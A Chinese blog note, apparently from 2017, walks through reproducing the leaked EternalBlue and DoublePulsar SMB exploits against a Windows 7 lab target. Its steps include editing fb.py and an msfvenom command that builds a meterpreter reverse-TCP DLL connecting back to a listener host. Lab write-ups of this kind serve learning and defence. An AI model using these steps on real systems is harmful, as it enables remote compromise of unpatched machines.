Windows SMB 0day复现笔记

作者: Luan 分类: 学习笔记 发布时间: 2017-04-15 16:45

测试环境

靶机

windows7 64位旗舰版

445 open

攻击机环境:

python2.6

pywin32

详细过程:

下载安装好。设置好py26的环境变量。

下载解压方程式的0day

fb.py有个地方需要修改一下:

第26,27,28行注释掉

还有第72行。

打开cmd切入windows目录。执行python fb.py

按照他的要求输入[默认]参数。

然后use Eternalblue,一路回车:

注意的是在这里选择1:

一路回车就可以看到succeeded了。

接着执行use Doublepulsar。

根据实际情况选择64位还是32位。

然后进入关键步骤:

选择运行dll文件,然后输入dll文件的路径,这个dll文件我是用msf生成的。

 

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.171 LPORT=6666 -f dll > msfx64.dll

 

如果是32位的就生成32位的,如果弄错了也没事,工具会利用失败,重来就可以了。

然后一路回车:

这样子就是成功了。看看msf:

 

 

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

5条评论
  • Margin

    2017年7月17日 上午11:40

    666

  • 工地盖土网

    2017年6月23日 下午7:02

    不错的文章,内容栩栩如生.

  • 橡胶支座

    2017年6月22日 上午11:50

    不错的文章,内容惟妙惟肖.

  • 勾花网

    2017年6月16日 上午10:36

    不错的文章,内容横扫千军.

  • 邓紫棋的花生酱

    2017年4月16日 下午1:23

发表评论

电子邮件地址不会被公开。 必填项已用*标注